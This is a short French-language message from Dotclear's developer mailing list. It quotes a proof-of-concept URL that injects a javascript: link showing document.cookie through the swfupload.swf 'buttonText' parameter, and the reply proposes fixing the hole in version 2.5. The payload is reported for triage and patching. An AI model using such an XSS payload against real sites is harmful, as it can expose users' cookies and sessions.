Le 12 mars 2013 06:54, Dsls <[email protected]> a écrit :
> poc sur dotclear:
> <urldublog>/admin/index.php?pf=swfupload.swf&buttonText=<a%20href=%27javascript:alert(document.cookie)%27>Click%20me</a>
>
> On est bien vulnérable.

à intégrer dans la 2.5 je pense
_______________________________________________
Dev mailing list - [email protected] - http://ml.dotclear.org/listinfo/dev

Répondre à